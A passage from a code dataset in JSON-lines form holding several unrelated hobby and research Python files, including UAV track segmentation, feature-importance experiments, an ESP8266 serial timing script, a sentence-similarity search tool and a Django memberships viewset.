this thread (overwrite all the time)\n df_segments.to_csv(pathCSVSegments, index=False)\n\n except Exception as err:\n print(f\"Error en thread {thread_id}, ejecutando la iteración {i} del fichero {trackFile}\")\n print(err)\n \n # Final storing of the segments\n df_segments.to_csv(pathCSVSegments, index=False)\n\n\n#############################################################\n# MAIN #\n#############################################################\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser(description='UAVClassifier')\n parser.add_argument('--useFlags', type=str, default=\"No\", help='Yes/No')\n parser.add_argument('--Debug', type=str, default=\"No\", help='Yes/No')\n parser.add_argument('--Resampling', type=str, default=\"No\", help='Before/After/No')\n parser.add_argument('--Segmentation', type=str, default='SQUISHE', help='Desired algorithm SQUISHE')\n parser.add_argument('--CRate', type=str, default=\"50\", help='Int with the desired porcentage of selected')\n parser.add_argument('--MinPoints', type=int, default=\"10\", help='Int with the desired number')\n parser.add_argument('--Parallel', type=str, default=\"No\", help='Yes/No')\n parser.add_argument('--Threads', type=int, default=\"4\", help='Int with the desired number of threads, -1 to auto calculate')\n parser.add_argument('--partialInputs', type=str, default=\"Yes\", help='Yes/No')\n args = parser.parse_args()\n\n # Algorithm configuration\n print(\"Using arguments\")\n if args.Debug == \"Yes\":\n debug = True\n else:\n debug = False\n if args.Resampling == \"Before\":\n processResampling_Beforesegments = True\n processResampling_Aftersegments = False\n elif args.Resampling == \"After\":\n processResampling_Beforesegments = False\n processResampling_Aftersegments = True\n else:\n processResampling_Beforesegments = False\n processResampling_Aftersegments = False\n processSegmentation= args.Segmentation \n if args.Parallel == \"Yes\":\n paralelize = True\n numThreads = 16 # Number of threads to use\n else:\n paralelize = False\n # Output flags\n if args.partialInputs == \"Yes\": savePartialInputs=True\n else: savePartialInputs=False\n \n ### Execute process\n # Read input data\n if debug:\n print(\"DEBUG: Loading data...\")\n \n # Read CSV\n pathsCSV = join(inputPath,instancesCSVFile)\n instancesCSV = loadDataCSV(pathsCSV)\n\n # Split data from class\n X = instancesCSV['ULG']\n y = instancesCSV['General']\n \n # paralellize execution\n if paralelize:\n if numThreads<1:\n numThreads = psutil.cpu_count() \n numFiles = len(X) # Number of files to process\n numFilesPerThread = int(numFiles/numThreads) # Number of files to process per thread\n print(\"Number of files to process: \", numFiles)\n print(\"Number of files per thread: \", numFilesPerThread)\n\n threads = []\n for i in range(numThreads):\n # get files to process in this thread\n if i == numThreads-1: \n filesToProcess = X[i*numFilesPerThread:] # last thread processes the remaining files\n associatedModels = y[i*numFilesPerThread:]\n else: \n filesToProcess = X[i*numFilesPerThread:(i+1)*numFilesPerThread] # other threads process the files assigned to them\n associatedModels = y[i*numFilesPerThread:(i+1)*numFilesPerThread]\n # Create the thread\n tracksDirPath = join(inputPath,tracksDir)\n outputPathPath = join(outputPath,dividedThreadsDir)\n t = multiprocessing.Process(target=segmentationProcess, args=(tracksDirPath, outputPathPath, i, filesToProcess, associatedModels, processSegmentation))\n threads.append(t)\n t.start()\n # Wait for all threads to finish\n for t in threads:\n t.join()\n\n # Merge the results\n segmentsList = pd.DataFrame()\n for i in range(numThreads):\n filename = os.path.join(outputPath, dividedThreadsDir, f\"segments_{i}.csv\")\n # read the CSV with Pandas\n df = pd.read_csv(filename, header=0)\n segmentsList = pd.concat([segmentsList, df], axis=0)\n if i == 0:\n # set header to CombinedDF\n segmentsList.columns = df.columns\n # Remove the individual files\n os.remove(filename)\n\n # Save the combined dataframe\n csvFile=join(outputPath, segmentationDir, \"segmentsCSVList.csv\")\n if savePartialInputs: segmentsList.to_csv(csvFile,index=False)\n\n # Single thread execution\n else:\n tracksDirPath = join(inputPath, tracksDir)\n outputPathPath = join(outputPath, segmentationDir)\n segmentsList = segmentationProcess(tracksDir=tracksDirPath, outputPath=outputPathPath, thread_id=0, tracks=X, models=y,\n segmentAlgorithm=processSegmentation, debug=debug)\n \n # Save the combined dataframe\n if savePartialInputs:\n filename = os.path.join(outputPath,segmentationDir, f\"segments_0.csv\")\n # read the CSV with Pandas\n segmentsList = pd.read_csv(filename, header=0)\n os.remove(filename)\n segmentsList.to_csv(join(outputPath,segmentationDir,\"segmentsCSVList.csv\"), index=False)\n\n # Save the combined dataframe\n","repo_name":"DavidSanpedrochez/UAVTrackClassification","sub_path":"2. data preparation/mainSegmentation.py","file_name":"mainSegmentation.py","file_ext":"py","file_size_in_byte":15680,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"73213679913","text":"def to_jaden_case(x):\n x = list(x)\n x[0] = x[0].upper()\n for j in range(1, len(x)):\n x[j] = x[j].lower()\n\n for i in range(len(x) - 1):\n if x[i] == ' ':\n x[i + 1] = x[i + 1].upper()\n\n x = ''.join(x)\n\n return x\n\n\nprint(to_jaden_case(\"How can mirrors be real if our eyes aren't real\"))\n","repo_name":"DaveAigbe/Challenges","sub_path":"CodeWars/CW - Jaden Casing Strings.py","file_name":"CW - Jaden Casing Strings.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28103402907","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport pandas as pd\nimport numpy as np\nfrom statsmodels.tools import categorical\n\n# https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.ExtraTreesClassifier.html\nfrom sklearn.ensemble import ExtraTreesClassifier, RandomForestClassifier\nfrom sklearn.feature_selection import RFE, RFECV\n\n\ndef _time_analyze_(func):\n from time import clock\n exec_times = 1\n\n def callf(*args, **kwargs):\n start = clock()\n for _ in range(exec_times):\n r = func(*args, **kwargs)\n finish = clock()\n print(\"{:<20}{:10.6} s\".format(func.__name__ + \":\", finish - start))\n return r\n return callf\n\n\nbatch_size = 10\n\ntrain_data_dir = '~/Downloads/new_ele_power_cur_vol_weather.load.Three.bias.csv'\nreader = pd.read_csv(train_data_dir, chunksize=1000,\n dtype={'STAT_DATE': np.str})\n\n# print('dataset.shape: ', dataset.shape)\n\n# features = dataset[dataset.columns.values.tolist()[:-1]]\n# label = dataset['is_bias']\n\n\n# @_time_analyze_\n# def Normal():\n# clf_p = RandomForestClassifier(\n# warm_start=True, oob_score=True)\n# # clf_p = ExtraTreesClassifier(warm_start=True, n_estimators=1)\n# clf_p.fit(features, label)\n# # print(clf_p.oob_score_)\n# print(clf_p.feature_importances_)\n# print(np.sum(clf_p.feature_importances_))\n\n\ndef getTrainData(batch_size):\n try:\n data_batch = reader.get_chunk(batch_size)\n return data_batch[data_batch.columns.values.tolist()[:-1]], data_batch['is_bias']\n except Exception as e:\n print(e)\n return None, None\n\n\n@_time_analyze_\ndef RandomForestWarmStart():\n clf_p = RandomForestClassifier(\n warm_start=True, n_estimators=1)\n # clf_p = ExtraTreesClassifier(warm_start=True, n_estimators=1)\n for data_batch in reader:\n f_batch = data_batch['STAT_DATE']\n # f_batch = categorical(f_batch\n # f_batch = data_batch[data_batch.columns.values.tolist()[:-1]]\n l_batch = data_batch['is_bias']\n clf_p.fit(f_batch, l_batch)\n # print(clf_p.estimators_)\n # print(clf_p)\n clf_p.n_estimators += 1\n # break\n # print(clf_p.oob_score_)\n print(clf_p.feature_importances_)\n print(np.sum(clf_p.feature_importances_))\n\n\n# 耗时较长\n@_time_analyze_\ndef ExtraTreesWarmStart():\n # clf_p = RandomForestClassifier(warm_start=True, n_estimators=1)\n clf_p = ExtraTreesClassifier(\n warm_start=True, n_estimators=1, bootstrap=True)\n for data_batch in reader:\n # print(\"in partial fit\")\n # data_batch = dataset[batch:batch+1000]\n f_batch = data_batch[data_batch.columns.values.tolist()[:-1]]\n l_batch = data_batch['is_bias']\n clf_p.fit(f_batch, l_batch)\n clf_p.n_estimators += 1\n # print(clf_p.oob_score_)\n print(clf_p.feature_importances_)\n print(np.sum(clf_p.feature_importances_))\n\n\n@_time_analyze_\ndef RFE_WarmStart():\n\n # clf_p = RandomForestClassifier(warm_start=True, n_estimators=1)\n clf_p = RandomForestClassifier(\n warm_start=True, n_estimators=1)\n selector = RFE(estimator=clf_p, n_features_to_select=1)\n for data_batch in reader:\n # print(\"in partial fit\")\n # data_batch = dataset[batch:batch+1000]\n f_batch = data_batch[data_batch.columns.values.tolist()[:-1]]\n l_batch = data_batch['is_bias']\n result = selector.fit(f_batch, l_batch)\n selector.estimator.n_estimators += 1\n # print(clf_p.feature_importances_)\n # result = selector.fit(features, label)\n # print(selector.estimator.oob_score_)\n # print(selector.estimator.feature_importances_)\n print(result.ranking_)\n\n\n@_time_analyze_\ndef RFECV_WarmStart():\n\n # clf_p = RandomForestClassifier(warm_start=True, n_estimators=1)\n clf_p = RandomForestClassifier(\n warm_start=True, n_estimators=1)\n selector = RFECV(estimator=clf_p)\n for data_batch in reader:\n # print(\"in partial fit\")\n # data_batch = dataset[batch:batch+1000]\n f_batch = data_batch[data_batch.columns.values.tolist()[:-1]]\n l_batch = data_batch['is_bias']\n result = selector.fit(f_batch, l_batch)\n selector.estimator.n_estimators += 1\n # print(clf_p.feature_importances_)\n # result = selector.fit(features, label)\n # print(selector.estimator.oob_score_)\n # print(selector.estimator.feature_importances_)\n print(result.ranking_)\n print(result.grid_scores_)\n print(np.sum(result.grid_scores_))\n\n\ndef Preview():\n # ds =\n for data_batch in reader:\n # print(data_batch.shape)\n print(data_batch.head(3))\n print(data_batch.ix[0:3, 0])\n print(data_batch.ix[0].dtype)\n print(data_batch['is_bias'].dtype)\n break\n pass\n\n\nif __name__ == '__main__':\n # Normal()\n # RandomForestWarmStart()\n # ExtraTreesWarmStart()\n # RFE_WarmStart()\n # RFECV_WarmStart()\n Preview()\n","repo_name":"oushu1zhangxiangxuan1/feature-engineering","sub_path":"feature-importance/warm_start_bigdata.py","file_name":"warm_start_bigdata.py","file_ext":"py","file_size_in_byte":5000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71040576873","text":"import os\nfrom pprint import pprint\nimport json\n\nfrom pandas import read_csv\n\nfrom state_county_names_codes import state_fips_code, state_county_code, county_acres\n\n\ndef get_county_landcover(nass, landcover_meta=None):\n state_codes = state_fips_code()\n df = read_csv(nass, index_col='GEOID')\n dct = {}\n for s, c in state_codes.items():\n if s not in state_county_code().keys():\n continue\n for k, v in state_county_code()[s].items():\n geoid = v['GEOID']\n tot_acres = county_acres()[geoid]\n water = tot_acres['water']\n land = tot_acres['land']\n total = land + water\n if total == 0:\n pass\n try:\n irr_area = df.loc[int(geoid)]['IRR_2017']\n dry_area = df.loc[int(geoid)]['CROP_2017'] - irr_area\n irr_ratio = irr_area / total\n dry_ratio = dry_area / total\n uncult_ratio = (land - irr_area - dry_area) / total\n water_ratio = water / total\n d = {'dryland': dry_ratio, 'irrigated': irr_ratio, 'uncultivated': uncult_ratio,\n 'water': water_ratio}\n if any([np.isnan(x) for x in [dry_ratio, irr_ratio, uncult_ratio, water_ratio]]):\n dct[geoid] = {'cover': 'unknown'}\n else:\n dct[geoid] = d\n except KeyError:\n dct[geoid] = {'cover': 'unknown'}\n if landcover_meta:\n with open(landcover_meta, 'w') as fp:\n fp.write(json.dumps(dct, indent=4, sort_keys=True))\n return None\n pprint(dct)\n\n\nif __name__ == '__main__':\n pass\n# ========================= EOF ====================================================================\n","repo_name":"dgketchum/IrrMapperHumid","sub_path":"mapco/landcover.py","file_name":"landcover.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69930088552","text":"import serial\nimport csv\nimport time\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pylab as plt\nimport re\nfrom tqdm import tqdm\n\nclass ESPSerial():\n def __init__(self, port):\n \"\"\"Construtor da classe ESP_Serial\"\"\"\n self.port = port\n self._open_serial()\n \n def _open_serial(self):\n \"\"\"Abre a porta serial\"\"\"\n self.serial = serial.Serial(self.port, 9600)\n \n def _close_serial(self):\n \"\"\"Fecha a porta serial\"\"\"\n self.serial.close()\n \n def aguardar_substring(self, substring):\n while True:\n line = str(self.serial.readline())\n # print(line)\n if substring in line:\n # print(f'Achei {substring}')\n return line\n else:\n # print(f'Não achei {substring}')\n continue\n \n def run_experiment(self):\n \"\"\"Executa o experimento e retorna os tempo de transferência\n return [int]\n para cada tamanho é feito 3 envios\n \"\"\"\n\n # tamanho dos arquivos: começa em 128 e vai de 128 em 128 até 10240\n sizes = [i for i in range(128, 10241, 128)]\n\n # data: {size: [time1, time2, time3]}\n # exemplo: {128: [1,2,3], 256: [4,5,6]}\n data = {}\n print(sizes)\n\n try:\n self.aguardar_substring(\"CONNECTED\")\n time.sleep(2)\n for size in tqdm(sizes):\n times = []\n for _ in range(3): # Faz 3 envios para cada tamanho de arquivo\n # Envia o tamanho do arquivo via serial para o ESP \n # self.aguardar_substring(\"FILE SIZE\")\n self.serial.write(f\"{size}\\n\".encode())\n \n # Aguarda um pouco para garantir que o ESP tenha tempo para processar a entrada\n time.sleep(2)\n \n # fica lendo linhas ate uma delas conter a palavra SUCCESS\n line = self.aguardar_substring(\"SUCCESS\")\n \n # Procura pelo tempo de transferência na linha lida\n time_match = re.search(r'Duration:(\\d+) ms', line)\n if time_match:\n times.append(int(time_match.group(1)))\n # print(f\"O tempo foi de: {time_match.group(1)}\")\n else:\n print(\"n achei o tempo\")\n time.sleep(2) \n \n data[size] = times\n # print(data)\n\n except Exception as e:\n print(f\"Ocorreu um erro durante o experimento: {e}\")\n return None\n\n return data\n\n\nif (__name__ == '__main__'):\n # Exemplo de uso\n esp_serial = ESPSerial('COM3') # Substitua 'COM3' pela porta serial do seu ESP8266\n data = esp_serial.run_experiment()\n esp_serial._close_serial()\n\n if data is not None:\n print(data)\n else:\n print(\"Experimento não foi concluído com sucesso.\")\n\n# # Abre a porta serial\n# ser = serial.Serial(args.port, 9600)\n\n\n\n# for size in range(6912,7200,128):\n# # Pede ao usuário para inserir o tamanho do arquivo\n# # size = input(\"Digite o tamanho do arquivo que você deseja (em Bytes): \")\n \n# # if not size.isdigit():\n# # print(\"Digite um valor válido.\")\n# # continue\n\n# # Envia o tamanho do arquivo via serial para o ESP\n# size = str(size)\n# ser.write(size.encode())\n# ser.write(b'\\n') # Envia uma nova linha para indicar o final da entrada\n\n# # Aguarda um pouco para garantir que o ESP tenha tempo para processar a entrada\n# time.sleep(2)\n\n\n# # fica lendo a saida do serial\n# while(1):\n# line = str(ser.readline())\n# print(line)\n\n# # Procura pelo tempo de transferência na linha lida\n# time_match = re.search(r'(\\d+) ms', line)\n# if(time_match):\n# print(f\"O tempo foi de: {time_match}\")\n# break\n\n# if time_match:\n# time_value = time_match.group(1)\n\n# # Escreve os dados no arquivo CSV\n# df = pd.read_csv('data.csv', index_col=False)\n# tam_bytes = df['QTD_Bytes'].to_list()\n# tempo_ms = df['Tempo_ms'].to_list()\n# dist_m = df['Distancia_m'].to_list()\n# qtd_paredes = df['QTD_Paredes'].to_list()\n\n# tam_bytes.append(size)\n# tempo_ms.append(time_value)\n# dist_m.append(args.distance)\n# qtd_paredes.append(args.walls)\n\n# ndf = pd.DataFrame()\n# ndf['QTD_Bytes']= np.array(tam_bytes)\n# ndf['Tempo_ms'] = np.array(tempo_ms )\n# ndf['Distancia_m'] = np.array(dist_m )\n# ndf['QTD_Paredes'] = np.array(qtd_paredes )\n\n# ndf.to_csv('data.csv', index=False)\n# print(f\"Dados salvos: Tamanho do Arquivo = {size} bytes, Tempo de Transferência = {time_value} ms\")\n\n# df = pd.read_csv('data.csv', index_col=False)\n\n\n# plt.plot(df['QTD_Bytes'], df['Tempo_ms'])\n# plt.show()","repo_name":"TarefasUFSC/Analise-de-Transferencia-de-dados-com-ESP8266","sub_path":"script/EspSerial.py","file_name":"EspSerial.py","file_ext":"py","file_size_in_byte":5073,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21503020026","text":"import asyncio\nimport csv\nimport aiohttp\nfrom sqlalchemy.orm import sessionmaker\nfrom utilities.db_connection import *\nfrom utilities.models_sql import *\n\n# connect to db\ndb_engine = initiate_engine(connection_str)\nconnection = db_engine.connect()\n\n# create session\nSession = sessionmaker(bind=db_engine)\nsession = Session()\n# fetch cast\ncast = session.query(Netflix).with_entities(Netflix.cast).all()\n\nsession.close()\n\n# find the unique actor names\nactors = []\nfor row in cast:\n actors.append(row[0].split(\",\"))\nactors = [actor for sublist in actors for actor in sublist]\nunique_actors = list(set(actors))\n\n# Async API calls to retrieve the gender and write to csv.\nasync def main(batch):\n async with aiohttp.ClientSession() as session:\n tasks = []\n for name in batch:\n name_for_url = \"+\".join(name.strip().split(\" \"))\n task = asyncio.ensure_future(get_actor_gender(session, name_for_url, name))\n tasks.append(task)\n\n gender = await asyncio.gather(*tasks)\n\n with open(\"gender.csv\", \"a\") as f:\n writer = csv.writer(f)\n writer.writerows(gender)\n\n\nasync def get_actor_gender(session, name_for_url, name):\n url = (\n f\"https://innovaapi.aminer.cn/tools/v1/predict/gender?name=\"\n + name_for_url\n + \"&org=\"\n )\n try:\n async with session.get(url) as response:\n result_data = await response.json()\n if response.status != 200:\n return {\"error\": f\"server returned {response.status}\"}\n else:\n try:\n gender = result_data[\"data\"][\"Final\"].get(\"gender\")\n except:\n gender = \"Not Found\"\n result = [name, gender]\n return result\n except asyncio.TimeoutError:\n return {\"Error\": f\"timeout error on {url}\"}\n\n\n# Narrowing the parallel API calls down to 1000 per time, due to asyncio.TimeoutError.\nbatch_lenght = 1000\nsub_lists = [\n unique_actors[i : i + batch_lenght]\n for i in range(0, len(unique_actors), batch_lenght)\n]\n\nfor batch in sub_lists:\n asyncio.run(main(batch))\n","repo_name":"nickzafi/Data-Engineer-Task","sub_path":"utilities/adding_gender.py","file_name":"adding_gender.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24816777048","text":"# find_matches.py\n\nimport common.disable_warnings\nimport common.configure_logging\n\nimport argparse\nimport glob\nimport h5py\nimport heapq\nimport itertools\nimport json\nimport logging\nimport numpy as np\nimport os\nimport sqlite3\n\nfrom openpyxl import Workbook\nfrom operator import itemgetter\nfrom tqdm import tqdm\n\nfrom common.spacy_model import load_default_model\nfrom documents.load import load_query_files\nfrom documents.store import TextStore\nfrom vectors.similarity import get_most_similar\nfrom vectors.store import VectorStore\n\n\ndef load_queries(query_dir):\n model = load_default_model()\n query_info = load_query_files(query_dir)\n strs, ids = zip(*query_info)\n strs = list(strs)\n\n # precompute a vector per query\n sents = model.pipe(strs, batch_size=100)\n vecs = np.array([s.vector / np.linalg.norm(s.vector) for s in sents])\n\n del model\n return strs, vecs, list(ids)\n\n\ndef search(query_vecs, corpus_dir, output_dir, n_best):\n h5_paths = sorted(glob.glob(os.path.join(corpus_dir, '*.h5')))\n\n n_queries = query_vecs.shape[0]\n matches = [[] for _ in range(n_queries)]\n sort_kwargs = {'key': itemgetter('score'), 'reverse': True}\n\n for h5_path in h5_paths:\n # in theory, we could parallelize searching across buckets, but np\n # multithreads under the covers, so we'd basically be stealing cores\n # for ourselves...\n base_path = os.path.splitext(h5_path)[0]\n filename = os.path.basename(base_path)\n logging.info('Searching {}...'.format(filename))\n\n sql_path = '{}.sqlite'.format(base_path)\n chkpt_path = os.path.join(output_dir,\n 'checkpoint-{}.npz'.format(filename))\n\n sub_matches = _match_bucket(query_vecs, h5_path, sql_path,\n chkpt_path, n_best)\n\n for q_idx, q_matches in enumerate(sub_matches):\n q_matches.sort(**sort_kwargs)\n existing = matches[q_idx]\n merged = heapq.merge(existing, q_matches, **sort_kwargs)\n matches[q_idx] = list(itertools.islice(merged, n_best))\n\n return matches\n\n\ndef _match_bucket(query_vecs, h5_path, sql_path, chkpt_path, n_best):\n sql_conn = None\n\n with h5py.File(h5_path, 'r') as h5f:\n vstore = VectorStore(h5f)\n scores, sent_coords = get_most_similar(vstore, query_vecs,\n chkpt_path, n_best)\n try:\n sql_conn = sqlite3.connect(sql_path)\n tstore = TextStore(sql_conn)\n\n logging.info('Updating found matches...')\n matches = _collate_matches(tstore, scores, sent_coords, n_best)\n\n finally:\n if sql_conn: sql_conn.close()\n\n return matches\n\n\ndef _collate_matches(tstore, scores, sent_coords, n_best):\n n_queries = scores.shape[1]\n\n all_matches = []\n with tqdm(total=n_best*n_queries) as pbar:\n # queries are by column, unfortunately\n for q_scores, q_coords in zip(scores.T, sent_coords.T):\n q_info = tstore.get_sent_info(q_coords)\n\n matches = []\n for s_score, s_info in zip(q_scores, q_info):\n s_info['score'] = str(s_score)\n matches.append(s_info)\n pbar.update()\n\n all_matches.append(matches)\n\n return all_matches\n\n\ndef write_json(json_path, queries, query_ids, matches):\n qms = [{'id': qid, 'query': q, 'matches': ms}\n for qid, q, ms in zip(query_ids, queries, matches)]\n\n with open(json_path, 'w') as f:\n json.dump(qms, f)\n\n\ndef write_spreadsheet(wb_path, queries, query_ids, matches):\n wb = Workbook()\n ws = wb.active\n\n for qid, query, matches in zip(query_ids, queries, matches):\n ws.title = qid\n ws.append(['# query: {}'.format(query)])\n\n header = ['score', 'sentence', 'url', 'checksum', 'date']\n ws.append(header)\n for m in matches:\n ws.append(m[k] for k in header)\n\n ws = wb.create_sheet()\n\n wb.save(wb_path)\n\n\ndef main():\n ap = argparse.ArgumentParser()\n ap.add_argument('corpus_dir')\n ap.add_argument('query_dir')\n ap.add_argument('output_dir')\n ap.add_argument('-n', dest='n_best', default=500)\n args = ap.parse_args()\n\n logging.info('Starting...')\n\n if not os.path.exists(args.output_dir):\n os.mkdir(args.output_dir)\n\n logging.info('Loading queries...')\n query_strs, query_vecs, query_ids = load_queries(args.query_dir)\n\n logging.info('Finding matches...')\n matches = search(query_vecs, args.corpus_dir, args.output_dir, args.n_best)\n\n # write this two ways -- once for my convenience, once for others'\n logging.info('Writing output...')\n\n json_path = os.path.join(args.output_dir, 'matches.json')\n write_json(json_path, query_strs, query_ids, matches)\n\n wb_path = os.path.join(args.output_dir, 'matches.xlsx')\n write_spreadsheet(wb_path, query_strs, query_ids, matches)\n\n logging.info('Done!')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"skdreier/religion-politics","sub_path":"similarity/find_matches.py","file_name":"find_matches.py","file_ext":"py","file_size_in_byte":4979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72996576553","text":"import json\nimport datetime\nimport importlib\nfrom calendargaps import *\n\n#Importance Parameters\na = 0.5\nb = 0.3\nc = 0.2\n\n#Input Variables\nprio = 0\nworkhours = 0\ndiff = 0\n\n#Other Setup\ntasklist = []\nworkingTaskList = []\nweek = []\nexittasks = 'n'\noverflow = False\neachDayTotal = 0\nweeklyOverage = 0\n\n#Error Handling\ndef inputRatingInRange(message,low,high):\n while True:\n try:\n x = int(input(message))\n if x < low or x > high:\n raise TypeError\n break\n except (TypeError, ValueError):\n print(\"\\nInvalid input. Please try again.\")\n print(\"----------------\")\n return x\n\n#Adding a New Task\ndef newTask():\n name = input(\"\\nTask Name: \")\n newPrio = inputRatingInRange(\"Priority (1-5): \",1,5)\n newDiff = inputRatingInRange(\"Difficulty (1-5): \",1,5)\n newworkhours = inputRatingInRange(\"Duration (1-5 hours): \",1,5)\n addedTask = Task(name, newPrio, newworkhours, newDiff)\n tasklist.append(addedTask)\n\n#JSON THINGS\ndef tasksToDict():\n listofdics = [item.__dict__ for item in tasklist]\n for dic in listofdics:\n dic['day'] = dic['day'].__dict__\n dic['day']['date'] = str(dic['day']['date'])\n dic['day']['worklist'] = [str(i) for i in dic['day']['worklist']]\n return listofdics\ndef tasksToJSON():\n with open('listoftasks.json', mode='w') as file:\n json.dump(tasksToDict(), file, indent=4)\n\n# Class Setup\nclass Task:\n def __init__(self, name, prio, workhours, diff):\n self.name = name\n self.prio = int(prio)\n self.workhours = datetime.timedelta(hours=workhours).seconds / 3600\n self.diff = int(diff)\n self.day = theday\n #This is the equation determining the importance based on the input parameters. Subject to change.\n self.importanceIndex = ((a*prio) + ((workhours-2)**2 + 1)*b + ((4/9*(diff-4)**2) + 1)*c)*20\n self.isAssigned = False\n self.overage = 0\n\n def printsummary(self):\n print(\" ----------------\",\"\\n\",\n self.name,\"\\n\",\n \"Priority:\", self.prio,\"\\n\",\n \"Difficulty:\", self.diff,\"\\n\",\n \"Duration:\", self.workhours,\"\\n\",\n \"Importance:\",round(self.importanceIndex,1),\"%\",\"\\n\",\n \"Will be done on:\", self.day.dayname)\n if self.overage > 0:\n print(\" *\"+str(self.overage), \"hours over*\\n\")\n\nclass Day:\n #Need to implement actual datetime stuff in here lol\n def __init__(self, date, worklist):\n self.date = date\n self.worklist = worklist\n self.workhours = sumOfDeltas(worklist).seconds / 3600\n self.dayname = date.strftime('%A')\n\n#--MAIN FLOW OF THE PROGRAM--#\n\n#Parse JSON from dict into task class\nwith open('listoftasks.json', mode='r') as file:\n JSONtasks = json.load(file)\n if not JSONtasks:\n tasklist = []\ntasklist = [Task(i['name'], i['prio'], i['workhours'], i['diff']) for i in JSONtasks]\n\n#Create new tasks\ncreateNewTasks = input('Create new tasks? (y/n): ')\nif createNewTasks == 'y':\n while exittasks == 'n':\n newTask()\n exittasks = input(\"Exit task entry stage? (y/n): \")\n\n#Create new days\n#NEED TO FIX SUPPORT FOR CROSS-MONTH RANGES!!\nif week == []:\n for i in range(2):\n week.append(Day(theday+datetime.timedelta(days=i+1), findGaps(theday+datetime.timedelta(days=i+1))))\n\n#Sort entries by Importance and slot them into available work-hours\ntasklist.sort(key=lambda x: x.importanceIndex, reverse=True)\ntotalWorkHours = sum([i.workhours for i in week])\nif sum([i.workhours for i in tasklist]) > sum([i.workhours for i in week]):\n print(\"Shit too damn big bruh\\n\")\n overflow = True #deal with this later\nelse:\n #Start fitting tasks in days:\n for eachDay in week:\n workingTaskList = [i for i in tasklist if not(i.isAssigned)]\n if workingTaskList == []:\n break\n eachDayTotal += eachDay.workhours\n for item in workingTaskList:\n item.day = eachDay\n eachDayTotal -= item.workhours\n item.isAssigned = True\n if eachDayTotal <= 0:\n if eachDayTotal < 0:\n item.overage -= eachDayTotal\n break\n #Print all entries\n for i in tasklist:\n i.printsummary()\n tasksToJSON()\n","repo_name":"JulsAwad/todolist","sub_path":"smarttodo.py","file_name":"smarttodo.py","file_ext":"py","file_size_in_byte":4271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31250670806","text":"import json\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\nconfig_file_name = \"/Users/jingyiwu/Documents/Project/MARL/configs/config.json\"\nwith open(config_file_name, 'r') as f:\n config = json.load(f)\n\ndecay_factor = 0.999\napp_type_id = 2\napp_type_sub_id = 1\npolicy_id = 0\nnum_servers = config[\"num_servers\"]\nfolder_name = config[\"folder_name\"]\nnum_servers = config[\"num_servers\"]\napp_type = config[\"app_types\"][app_type_id]\napp_sub_type = config[\"app_sub_types\"][app_type][app_type_sub_id]\npolicy_type = config[\"policy_types\"][policy_id]\npath = f\"{folder_name}/{num_servers}_server/{policy_type}/{app_type}_{app_sub_type}\"\ndata_server_0 = []\ndata_server_1 = []\ndata_server_2 = []\n\nfor server_id in [2, 56, 75]:\n itr = 1\n avg_length = 0\n y = [] # Initialize the y-axis\n file_path = os.path.join(path, f\"server_{server_id}_app_states.txt\")\n with open(file_path, 'r') as file:\n lines = file.readlines()\n for line in lines:\n avg_length = decay_factor * avg_length + (1 - decay_factor) * float(line.strip())\n if (itr) % 10 == 0:\n y.append(avg_length / (1 - decay_factor ** itr))\n itr += 1\n if server_id == 2:\n data_server_0 = y\n elif server_id == 56:\n data_server_1 = y\n elif server_id == 75:\n data_server_2 = y\n\nwith open(os.path.join(\"/Users/jingyiwu/Documents/Project/MARL_PAPER/asplos24/data\", f\"q{app_type_sub_id+1}_length_change.txt\"), \"w\") as file:\n for i in range(len(data_server_0)): # Assuming all lists have the same length\n file.write(f\"{data_server_0[i]}\\t{data_server_1[i]}\\t{data_server_2[i]}\\n\")\n","repo_name":"Huangmao1208/MARL","sub_path":"src/plot_comparison.py","file_name":"plot_comparison.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35900026456","text":"\"\"\"Memberships Views.\"\"\"\n\nfrom rest_framework import mixins, status, viewsets, pagination\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response \nfrom rest_framework.views import APIView\n\nfrom rest_framework.permissions import (\n IsAuthenticated\n)\nfrom crm.memberships.serializers import (CreateSerializer,\n ListRetrieveMembershipModelSerializer,\n UpdateSerializer)\nfrom crm.memberships.models import Membership, Payment, BankAccount\nfrom django_filters import rest_framework as filters\n\n\nclass MembershipViewSet(viewsets.GenericViewSet,\n mixins.CreateModelMixin,\n mixins.RetrieveModelMixin, \n mixins.UpdateModelMixin, \n mixins.ListModelMixin): \n\n class CustomPagination(pagination.PageNumberPagination):\n page_size = 1000\n permission_classes = [IsAuthenticated]\n pagination_class = CustomPagination \n queryset = Membership.objects.all().order_by('date_initial') \n filter_backends = (filters.DjangoFilterBackend,)\n \n\n class MembershipFilter(filters.FilterSet):\n class Meta:\n model = Membership\n\n fields = {\n # crear filtros por rut\n 'client_business__dni_business': ['contains'], \n 'client_person__dni': ['contains'], \n 'valoration': ['exact'], \n 'date_initial': ['contains', 'gte', 'lte', 'year', \n 'month', 'day', 'year__range', 'month__range',\n 'day__range', 'date__range', 'hour', 'minute', 'second', \n 'hour__range', 'minute__range', 'minute__range'], \n 'date_finish': ['contains', 'gte', 'lte', 'year', 'month', 'day', \n 'year__range', 